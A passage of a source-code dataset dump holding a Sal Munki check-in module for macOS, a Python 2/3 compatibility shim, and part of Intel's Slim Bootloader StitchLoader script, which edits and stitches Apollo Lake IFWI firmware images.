] | 23
|
2015-08-04T22:56:55.000Z
|
2022-02-14T12:41:23.000Z
|
payload/usr/local/sal/checkin_modules/munki_checkin.py
|
forvitinn/sal-scripts
|
585934f641732b29c0f0be9072b32606ccc8e96a
|
[
"Apache-2.0"
] | 40
|
2016-01-28T17:29:52.000Z
|
2021-11-12T04:22:48.000Z
|
payload/usr/local/sal/checkin_modules/munki_checkin.py
|
forvitinn/sal-scripts
|
585934f641732b29c0f0be9072b32606ccc8e96a
|
[
"Apache-2.0"
] | 45
|
2015-08-04T00:12:28.000Z
|
2022-02-21T20:06:40.000Z
|
#!/usr/local/sal/Python.framework/Versions/Current/bin/python3
import datetime
import pathlib
import plistlib
import sys
import sal
sys.path.insert(0, "/usr/local/munki")
from munkilib import munkicommon
__version__ = "1.2.0"
def main():
    """Collect the last Munki run's results and store them as Sal checkin data.

    Reads Munki's ManagedInstallReport, merges it with any previously
    submitted 'munki' checkin section (so install/removal history is
    preserved across failed submissions), and saves the merged section
    via sal.set_checkin_results().
    """
    # If we haven't successfully submitted to Sal, pull the existing
    # munki section rather than start from scratch, as we want to
    # keep any install/removal history that may be there.
    munki_submission = sal.get_checkin_results().get("munki", {})
    munki_report = get_managed_install_report()

    extras = {}
    extras["munki_version"] = munki_report["MachineInfo"].get("munki_version")
    extras["manifest"] = munki_report.get("ManifestName")
    extras["runtype"] = munki_report.get("RunType", "custom")
    munki_submission["extra_data"] = extras

    munki_submission["facts"] = {
        "checkin_module_version": __version__,
        "RunType": munki_report["RunType"],
        "StartTime": munki_report["StartTime"],
        "EndTime": munki_report["EndTime"],
    }
    if munki_report.get("Conditions"):
        for condition, value in munki_report["Conditions"].items():
            # Join lists of strings into a comma-delimited string, as
            # the server wants just text.
            try:
                if hasattr(value, "append"):
                    value = ", ".join(value)
            except Exception:
                # We got something weird from a condition that probably
                # wouldn't work anyway; skip it.
                continue
            munki_submission["facts"][condition] = value

    munki_submission["messages"] = []
    for key in ("Errors", "Warnings"):
        for msg in munki_report[key]:
            # We need to drop the final 'S' to match Sal's message types.
            munki_submission["messages"].append(
                {"message_type": key.upper()[:-1], "text": msg}
            )

    now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat()
    # Process managed items and update histories.
    munki_submission["managed_items"] = {}
    optional_manifest = get_optional_manifest()

    for item in munki_report.get("ManagedInstalls", []):
        submission_item = {"date_managed": now}
        submission_item["status"] = "PRESENT" if item["installed"] else "PENDING"

        version_key = (
            "version_to_install" if not item["installed"] else "installed_version"
        )
        version = item[version_key]
        name = f'{item["name"]} {version}'
        submission_item["name"] = name

        # Pop off these two since we already used them.
        item.pop("name")
        item.pop("installed")

        item["type"] = "ManagedInstalls"
        self_serve = (
            "True" if name in optional_manifest.get("managed_installs", []) else "False"
        )
        item["self_serve"] = self_serve
        submission_item["data"] = item
        munki_submission["managed_items"][name] = submission_item

    for item in munki_report.get("managed_uninstalls_list", []):
        submission_item = {"date_managed": now, "status": "ABSENT"}
        # BUGFIX: this previously tested the stale `name` left over from the
        # ManagedInstalls loop above (a NameError when that list was empty,
        # and the wrong lookup otherwise); the uninstall entry itself is the
        # name to check against the self-serve manifest.
        self_serve = (
            "True"
            if item in optional_manifest.get("managed_uninstalls", [])
            else "False"
        )
        submission_item["data"] = {
            "self_serve": self_serve,
            "type": "ManagedUninstalls",
        }
        munki_submission["managed_items"][item] = submission_item

    # Process InstallResults and RemovalResults into update history
    for report_key in ("InstallResults", "RemovalResults"):
        for item in munki_report.get(report_key, []):
            # Skip Apple software update items.
            if item.get("applesus"):
                continue
            # Construct key; we pop the name off because we don't need
            # to submit it again when we stuff `item` into `data`.
            name = f'{item.pop("name")} {item["version"]}'
            submission_item = munki_submission["managed_items"].get(
                name, {"name": name}
            )
            if item.get("status") != 0:
                # Something went wrong, so change the status.
                submission_item["status"] = "ERROR"
            if "data" in submission_item:
                submission_item["data"].update(item)
            else:
                submission_item["data"] = item
            if "type" not in submission_item["data"]:
                submission_item["data"]["type"] = (
                    "ManagedInstalls"
                    if report_key == "InstallResults"
                    else "ManagedUninstalls"
                )
            # This UTC datetime gets converted to a naive datetime by
            # plistlib. Fortunately, we can just tell it that it's UTC.
            submission_item["date_managed"] = (
                item["time"].replace(tzinfo=datetime.timezone.utc).isoformat()
            )
            munki_submission["managed_items"][name] = submission_item

    sal.set_checkin_results("Munki", munki_submission)
def get_managed_install_report():
    """Return Munki ManagedInstallsReport.plist as a plist dict.

    Returns:
        ManagedInstalls report for last Munki run as a plist
        dict, or an empty dict.
    """
    # Munki's own preference tells us where its install directory lives;
    # the report from the last run sits directly inside it.
    report_path = (
        pathlib.Path(munkicommon.pref("ManagedInstallDir"))
        / "ManagedInstallReport.plist"
    )
    try:
        report = plistlib.loads(report_path.read_bytes())
    except (IOError, plistlib.InvalidFileException):
        report = {}

    # Downstream code indexes into MachineInfo unconditionally.
    if "MachineInfo" not in report:
        report["MachineInfo"] = {}

    return sal.unobjctify(report)
def get_optional_manifest():
    """Return Munki SelfServeManifest as a plist dict.

    Returns:
        SelfServeManifest for last Munki run as a plist
        dict, or an empty dict.
    """
    # The self-serve manifest lives under Munki's configured install dir.
    manifest_path = (
        pathlib.Path(munkicommon.pref("ManagedInstallDir"))
        / "manifests/SelfServeManifest"
    )
    try:
        return plistlib.loads(manifest_path.read_bytes())
    except (IOError, plistlib.InvalidFileException):
        return {}
# Script entry point: run the Munki checkin when executed directly.
if __name__ == "__main__":
    main()
| 35.370968
| 91
| 0.622739
|
import datetime
import pathlib
import plistlib
import sys
import sal
sys.path.insert(0, "/usr/local/munki")
from munkilib import munkicommon
__version__ = "1.2.0"
def main():
# munki section rather than start from scratch, as we want to
# keep any install/removal history that may be there.
munki_submission = sal.get_checkin_results().get("munki", {})
munki_report = get_managed_install_report()
extras = {}
extras["munki_version"] = munki_report["MachineInfo"].get("munki_version")
extras["manifest"] = munki_report.get("ManifestName")
extras["runtype"] = munki_report.get("RunType", "custom")
munki_submission["extra_data"] = extras
munki_submission["facts"] = {
"checkin_module_version": __version__,
"RunType": munki_report["RunType"],
"StartTime": munki_report["StartTime"],
"EndTime": munki_report["EndTime"],
}
if munki_report.get("Conditions"):
for condition, value in munki_report["Conditions"].items():
# Join lists of strings into a comma-delimited string, as
# the server wants just text.
try:
if hasattr(value, "append"):
value = ", ".join(value)
except Exception as e:
# We god something weird from a condtion that probably wouldn't work anyway
continue
munki_submission["facts"][condition] = value
munki_submission["messages"] = []
for key in ("Errors", "Warnings"):
for msg in munki_report[key]:
munki_submission["messages"].append(
{"message_type": key.upper()[:-1], "text": msg}
)
now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat()
# Process managed items and update histories.
munki_submission["managed_items"] = {}
optional_manifest = get_optional_manifest()
for item in munki_report.get("ManagedInstalls", []):
submission_item = {"date_managed": now}
submission_item["status"] = "PRESENT" if item["installed"] else "PENDING"
version_key = (
"version_to_install" if not item["installed"] else "installed_version"
)
version = item[version_key]
name = f'{item["name"]} {version}'
submission_item["name"] = name
# Pop off these two since we already used them.
item.pop("name")
item.pop("installed")
item["type"] = "ManagedInstalls"
self_serve = (
"True" if name in optional_manifest.get("managed_installs", []) else "False"
)
item["self_serve"] = self_serve
submission_item["data"] = item
munki_submission["managed_items"][name] = submission_item
for item in munki_report.get("managed_uninstalls_list", []):
submission_item = {"date_managed": now, "status": "ABSENT"}
self_serve = (
"True"
if name in optional_manifest.get("managed_uninstalls", [])
else "False"
)
submission_item["data"] = {
"self_serve": self_serve,
"type": "ManagedUninstalls",
}
munki_submission["managed_items"][item] = submission_item
# Process InstallResults and RemovalResults into update history
for report_key in ("InstallResults", "RemovalResults"):
for item in munki_report.get(report_key, []):
# Skip Apple software update items.
if item.get("applesus"):
continue
# Construct key; we pop the name off because we don't need
name = f'{item.pop("name")} {item["version"]}'
submission_item = munki_submission["managed_items"].get(
name, {"name": name}
)
if item.get("status") != 0:
submission_item["status"] = "ERROR"
if "data" in submission_item:
submission_item["data"].update(item)
else:
submission_item["data"] = item
if "type" not in submission_item["data"]:
submission_item["data"]["type"] = (
"ManagedInstalls"
if report_key == "InstallResults"
else "ManagedUninstalls"
)
submission_item["date_managed"] = (
item["time"].replace(tzinfo=datetime.timezone.utc).isoformat()
)
munki_submission["managed_items"][name] = submission_item
sal.set_checkin_results("Munki", munki_submission)
def get_managed_install_report():
# Checks munki preferences to see where the install directory is set to.
managed_install_dir = munkicommon.pref("ManagedInstallDir")
# set the paths based on munki's configuration.
managed_install_report = (
pathlib.Path(managed_install_dir) / "ManagedInstallReport.plist"
)
try:
munki_report = plistlib.loads(managed_install_report.read_bytes())
except (IOError, plistlib.InvalidFileException):
munki_report = {}
if "MachineInfo" not in munki_report:
munki_report["MachineInfo"] = {}
return sal.unobjctify(munki_report)
def get_optional_manifest():
managed_install_dir = munkicommon.pref("ManagedInstallDir")
optional_manifest_path = (
pathlib.Path(managed_install_dir) / "manifests/SelfServeManifest"
)
try:
optional_manifest = plistlib.loads(optional_manifest_path.read_bytes())
except (IOError, plistlib.InvalidFileException):
optional_manifest = {}
return optional_manifest
if __name__ == "__main__":
main()
| true
| true
|
f705c7a4e86112d7fbf69a0db1bd54f293460d18
| 200
|
py
|
Python
|
jscaller/_compatiable.py
|
ZSAIm/PyJSCaller
|
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
|
[
"Apache-2.0"
] | 31
|
2019-05-06T03:07:58.000Z
|
2022-02-09T02:00:46.000Z
|
jscaller/_compatiable.py
|
zackmark29/PyJSCaller
|
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
|
[
"Apache-2.0"
] | 1
|
2019-07-05T12:43:34.000Z
|
2019-07-26T08:22:19.000Z
|
jscaller/_compatiable.py
|
zackmark29/PyJSCaller
|
086b3a0bf57f9c42c4d9c3cea6e7cdad5f52059d
|
[
"Apache-2.0"
] | 10
|
2019-05-07T06:35:21.000Z
|
2021-09-27T02:48:40.000Z
|
__all__ = ["PY2", "PY3"]

import sys

# Interpreter major-version flags.  On any interpreter that is neither
# Python 2 nor Python 3, both flags end up False.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
| 12.5
| 30
| 0.56
|
__all__ = ["PY2", "PY3"]
import sys
if sys.version_info[0] == 2:
PY2 = True
PY3 = False
elif sys.version_info[0] == 3:
PY2 = False
PY3 = True
else:
PY2 = False
PY3 = False
| true
| true
|
f705c7f93432895a83a22e63702790a8a3602602
| 25,944
|
py
|
Python
|
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
|
aimanrosli23/slimbootloader
|
bce49fbc5ac125cccf4f647e786409f49a026769
|
[
"BSD-2-Clause-NetBSD",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"MIT",
"BSD-2-Clause-Patent"
] | 1
|
2022-03-04T18:23:35.000Z
|
2022-03-04T18:23:35.000Z
|
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
|
aimanrosli23/slimbootloader
|
bce49fbc5ac125cccf4f647e786409f49a026769
|
[
"BSD-2-Clause-NetBSD",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"MIT",
"BSD-2-Clause-Patent"
] | null | null | null |
Platform/ApollolakeBoardPkg/Script/StitchLoader.py
|
aimanrosli23/slimbootloader
|
bce49fbc5ac125cccf4f647e786409f49a026769
|
[
"BSD-2-Clause-NetBSD",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"MIT",
"BSD-2-Clause-Patent"
] | null | null | null |
## @ StitchLoader.py
# This is a python stitching script for Slim Bootloader APL build
#
# Copyright (c) 2018 - 2022, Intel Corporation. All rights reserved. <BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
import os
import re
import sys
import struct
import argparse
import zipfile
import shutil
from ctypes import *
from subprocess import check_output
from functools import reduce
sys.dont_write_bytecode = True
sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../'))
if not os.path.exists (sblopen_dir):
sblopen_dir = os.getenv('SBL_SOURCE', '')
sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools'))
try:
from IfwiUtility import *
except ImportError:
err_msg = "Cannot find IfwiUtility module!\n"
err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder."
raise ImportError(err_msg)
extra_usage_txt = \
"""This script creates a new Apollo Lake Slim Bootloader IFWI image basing
on an existing IFWI base image. Please note, this stitching method will work
only if Boot Guard in the base image is not enabled, and the silicon is not
fused with Boot Guard enabled.
Please follow steps below:
1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform,
such as MinnowBoard 3, LeafHill, etc. The URL is below:
https://firmware.intel.com/projects/minnowboard3
Alternatively, the original IFWI image from the onboard SPI flash can be
read out as the base image too.
2. Build Slim Bootloader source tree and generate a stitching ZIP package.
The generated ZIP package is located at:
$(WORKSPACE)/Outputs/apl/Stitch_Components.zip
3. Stitch to create a new IFWI image.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s
Stitch_Components.zip -o SlimBoot.bin
4. Optionally, to view the flash layout for an given IFWI image,
specify '-i' option only.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin
"""
# BPDT file components are placed/padded on this 4 KB page boundary.
FILE_ALIGN = 0x1000
class IFWI_MANIPULATE:
    """Operations on a parsed IFWI component tree and its raw image bytes.

    add/remove/replace/copy work on the COMPONENT tree produced by
    IFWI_PARSER; create_dir_data / refresh_ifwi_for_dir then rebuild the
    affected BPDT directory bytes inside the bytearray image.  Methods
    return 0 on success and a negative error code (with a printed
    diagnostic) on failure, except create_dir_data which returns bytes.
    """
    def add_component (self, root, path, before = '$', file_path = ''):
        """Insert a FILE component at *path* under its parent directory.

        *before* selects the insertion point: '$' appends, '^' prepends,
        any other value names the existing sibling to insert in front of.
        *file_path* supplies the content; empty means a 4 KB placeholder.
        """
        nodes = path.split('/')
        parent_path = '/'.join(nodes[:-1])
        dir_comp = IFWI_PARSER.locate_component (root, parent_path)
        if not dir_comp:
            print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
            return -1
        if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
            print ('Can only add FILE type !')
            return -2
        index = None
        if before == '$':
            # Add to end
            index = len(dir_comp.child)
        elif before == '^':
            # Add to top
            index = 0
        else:
            for idx, file in enumerate(dir_comp.child):
                if before == file.name:
                    index = idx
        if index is None:
            print ('Cannot find FILE %s !' % before)
            return -3
        else:
            length = os.path.getsize(file_path) if file_path else 0x1000
            comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length)
            comp.set_data (file_path)
            dir_comp.add_child (comp, index)
            return 0
    def remove_component (self, root, path):
        """Delete the FILE component named by *path* from its parent directory."""
        nodes = path.split('/')
        parent_path = '/'.join(nodes[:-1])
        dir_comp = IFWI_PARSER.locate_component (root, parent_path)
        if not dir_comp:
            print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
            return -1
        if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
            print ('Can only replace FILE type !')
            return -2
        index = None
        for idx, file in enumerate(dir_comp.child):
            if file.name == nodes[-1]:
                index = idx
                break
        if index is None:
            print ('Cannot find FILE %s !' % path)
            return -3
        else:
            del dir_comp.child[index]
            return 0
    def replace_component (self, root, path, file_path):
        """Replace the content/length of the FILE component at *path*."""
        comp = IFWI_PARSER.locate_component (root, path)
        if not comp:
            print ('Cannot find FILE %s !' % path)
            return -1
        if comp.type != COMPONENT.COMP_TYPE['FILE']:
            # NOTE(review): the '%' below has no placeholder in the format
            # string, so this line raises TypeError if ever reached; it
            # should be a plain string (or include %s for path).
            print ('Can only replace FILE type !' % path)
            return -2
        comp.length = os.path.getsize(file_path) if file_path else 0x1000
        if file_path:
            comp.set_data (file_path)
        return 0
    def copy_component (self, root, path, ifwi_data):
        """Duplicate BP0's BPDT into BP1 (redundant layout) inside *ifwi_data*.

        BP1's original SBPDT is appended after the copied BPDT and all
        affected BPDT/SBPDT headers are fixed up in place.
        """
        print ("COPY BP0 BPDT to BP1 BPDT ...")
        # Backup BP0 BPDT and BP1 SBPDT
        bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1')
        bp0bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT')
        bp1bpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT')
        bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT')
        bp0bpdt_data = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset + bp0bpdt.length])
        bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length])
        # Copy to BP0 BPDT to BP1 BPDT
        bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length
        ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data
        # Append original BP1 SBPDT
        bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length
        ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data
        padding = bp1.offset + bp1.length - bp1sbpdt_end_offset
        if padding < 0:
            print ('Insufficiant space in BP1 partition !')
            return -1
        # Fill the tail of BP1 with 0xFF (erased-flash value).
        ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding
        # Fix Sbpdt length in BP1 BPDT
        offset = bp1bpdt.offset
        bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
        offset += sizeof(BPDT_HEADER)
        for idx in range(bpdt_hdr.desc_cnt):
            bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
            if "BpdtSbpdt" == str(bpdt_entry.type):
                bpdt_entry.sub_part_size = bp1sbpdt.length
            offset += sizeof(BPDT_ENTRY)
        # Fix Sbpdt headers
        offset = bp1sbpdt_offset
        bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
        offset += sizeof(BPDT_HEADER)
        for idx in range(bpdt_hdr.desc_cnt):
            bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
            # The SBPDT moved by the size difference between BP0 and BP1 BPDTs.
            bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length)
            offset += sizeof(BPDT_ENTRY)
        print ("Done!")
        return 0
    def create_dir_data (self, dir, ifwi_data):
        """Rebuild and return the raw directory bytes for *dir* (BpdtIbb/BpdtObb).

        Lays out each child with its required alignment (.man/.met files
        are unaligned, IPAD/OPAD 0x40, everything else FILE_ALIGN), writes
        the SUBPART_DIR_ENTRY table, and recomputes the header checksum.
        """
        # Calculate new DIR length and create new DIR data
        support_list = ["BpdtIbb", "BpdtObb"]
        if dir.name not in support_list:
            raise Exception ('Only %s are supported !' % ' '.join(support_list))
        adjust = True
        offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
        sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset)
        dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER))
        for idx, comp in enumerate(dir.child):
            delta = 0
            parts = os.path.splitext(comp.name)
            if len(parts) > 1 and parts[1] in ['.man', '.met']:
                align = 1
            elif comp.name in ['IPAD', 'OPAD']:
                align = 0x40
            else:
                align = FILE_ALIGN
                delta = dir.offset & (FILE_ALIGN - 1)
            next_offset = ((offset + delta + align - 1) & ~(align - 1))
            count = next_offset - offset
            if adjust:
                adjust = False
                count -= delta
            dir_data.extend(b'\xff' * count)
            comp_data = comp.get_data()
            if comp_data:
                dir_data.extend(comp_data)
            else:
                # No replacement data set; reuse the component's current bytes.
                dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length])
            sub_dir = SUBPART_DIR_ENTRY()
            sub_dir.entry_name = comp.name.encode()
            sub_dir.entry_offset = next_offset - delta
            sub_dir.entry_size = comp.length
            sub_dir.reserved1 = 0
            sub_dir.reserved2 = 0
            entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
            dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir)
            next_offset += comp.length
            offset = next_offset
        align = FILE_ALIGN
        next_offset = ((offset + align - 1) & ~(align - 1))
        dir_data.extend(b'\xff' * (next_offset - offset))
        # Update checksum
        sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data)
        sub_dir_hdr.num_of_entries = len(dir.child)
        sub_dir_hdr.checksum = 0
        dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
        length = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
        sum_buf = (c_uint8 * length).from_buffer_copy(dir_data)
        # Two's-complement 8-bit checksum over header plus entry table.
        sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF
        dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
        remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1)
        if remaining:
            # Not page aligned, add padding
            dir_data.extend(b'\xff' * (FILE_ALIGN - remaining))
        return dir_data
    def refresh_ifwi_for_dir (self, dir, ifwi_data):
        """Regenerate *dir*'s bytes and splice them back into *ifwi_data*.

        Propagates the resulting size delta up the component tree, patches
        the owning BPDT/SBPDT headers, and rebuilds the image so the boot
        partition keeps its original total size (padding with 0xFF when
        the directory shrank).
        """
        # Calculate new DIR length and create new DIR data
        dir_data = self.create_dir_data (dir, ifwi_data)
        length = len (dir_data)
        adjust_length = length - dir.length
        if (dir.offset + length) & (FILE_ALIGN - 1):
            print ('DIR total size needs to be 4KB aligned !')
        # Remember original SBPDT offset
        org_bpdt_offset = dir.parent.parent.child[0].offset
        org_sbpdt_offset = dir.parent.parent.child[1].offset
        # Adjust offset and size for peer and up level in tree
        old_dir = dir
        while dir.type != COMPONENT.COMP_TYPE['BP']:
            for each in dir.parent.child:
                if each.offset > dir.offset:
                    each.offset += adjust_length
            dir.length += adjust_length
            dir = dir.parent
        dir = old_dir
        # Update parent BPDT header info in IFWI data
        parent = dir.parent
        bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset)
        base = parent.offset + sizeof(BPDT_HEADER)
        found = False
        for idx in range(bpdt_hdr.desc_cnt):
            bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY))
            comps = [x for x in parent.child if x.name == str(bpdt_entry.type)]
            if len(comps) == 0:
                continue
            if len(comps) > 1:
                # NOTE(review): this passes a tuple to Exception instead of
                # %-formatting the message; the text is never interpolated.
                raise Exception ('Found duplicated DIR %s !', bpdt_entry.type)
            bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset
            if dir.name == str(bpdt_entry.type):
                bpdt_entry.sub_part_size = length
                found = True
        if not found:
            raise Exception ('Could not find DIR %s !', dir.name)
        # Update SBPDT DIR header in IFWI data
        bp_comp = parent.parent
        if parent.name == 'BPDT':
            bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset)
            bpdt_hdr.xor_sum = 0
            base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER)
            for idx in range(bpdt_hdr.desc_cnt):
                bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
                bpdt_entry.sub_part_offset += adjust_length
                if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
                    raise Exception ('Insufficiant space in layout !')
        else:
            # 'SBPDT', update length in BPDT
            bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset)
            bpdt_hdr.xor_sum = 0
            base_offset = org_bpdt_offset + sizeof(BPDT_HEADER)
            for idx in range(bpdt_hdr.desc_cnt):
                bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
                if str(bpdt_entry.type) == "BpdtSbpdt":
                    bpdt_entry.sub_part_size += adjust_length
                if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
                    raise Exception ('Insufficiant space in layout !')
        # Generate actual final IFWI Data
        if adjust_length > 0:
            ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
                           ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \
                           ifwi_data[bp_comp.offset + bp_comp.length:]
        else:
            adjust_length = -adjust_length
            ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
                           ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \
                           b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:]
        return 0
def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'):
    """Apply one ADD/REMOVE/REPLACE/COPY operation to *ifwi_data* in place.

    Parses the image, dispatches to the matching IFWI_MANIPULATE method,
    and on success refreshes the raw bytes of the directory that owns
    *path*.  Returns the operation's status code (0 on success, -100 for
    an unknown action).
    """
    print ('%s %s ...' % (action, path))
    root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
    op = IFWI_MANIPULATE()
    if action == "ADD":
        status = op.add_component (root, path, before, file_name)
    elif action == "REMOVE":
        status = op.remove_component (root, path)
    elif action == "REPLACE":
        status = op.replace_component (root, path, file_name)
    elif action == "COPY":
        status = op.copy_component (root, 'IFWI/BIOS/BP0/BPDT', ifwi_data)
    else:
        status = -100
    if status == 0 and path:
        # Rebuild the bytes of the directory containing the touched component.
        parent_path = '/'.join(path.split('/')[:-1])
        parent_dir = IFWI_PARSER.locate_component (root, parent_path)
        op.refresh_ifwi_for_dir (parent_dir, ifwi_data)
    print ('done!')
    return status
def patch_flash_map (image_data, platform_data = 0xffffffff):
    """Patch the Slim Bootloader flash-map table(s) embedded in *image_data*.

    For each boot partition containing a Stage1A (IBBL), writes
    *platform_data* into its trailer, then walks the FLASH_MAP entries
    and fixes each component's offset/size from the actual BPDT layout.
    Returns 0 on success, -1 if the image cannot be parsed, -2 if the
    BP0/BP1 partitions are missing; raises on layout inconsistencies.
    """
    # Maps each flash-map signature to the BPDT path of its component.
    comp_bpdt_dict = {
        b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD",
        b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB",
        b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD",
        b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR",
        b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD",
        b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR",
        b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD",
        b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD",
        b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH",
        b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP",
        b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB",
        b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB",
        b'SG1A' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL",
        b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met",
    }
    print ("Patching Slim Bootloader Flash Map table ...")
    output_image_data = image_data
    ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data)
    if not ifwi:
        return -1
    # When the payload is not in BP0's BPDT, it lives in BP1's SBPDT instead.
    pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD'])
    if not pld:
        comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD"
    bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0')
    bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1')
    if not bp0 or not bp1:
        return -2
    # Locate FlashMap offset
    for part in range(2):
        path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part)
        comp = IFWI_PARSER.locate_component (ifwi, path)
        if not comp:
            if part == 0:
                raise Exception("Cannot locate %s !" % path)
            else:
                # Non-redundant layout: no Stage1A in BP1, nothing to patch there.
                continue
        stage1AOffset = comp.offset
        stage1ALength = comp.length
        # The last 8 bytes of Stage1A hold platform data and the flash-map pointer.
        temp = stage1AOffset + stage1ALength - 8
        c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data
        fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF
        fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off)
        entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC)
        fla_map_str.romsize = bp0.length + bp1.length
        if part == 1:
            fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION']
        for idx in range (entry_num):
            desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
            path = comp_bpdt_dict[desc.sig]
            if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']):
                path = path.replace("BP0", "BP1")
            if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']):
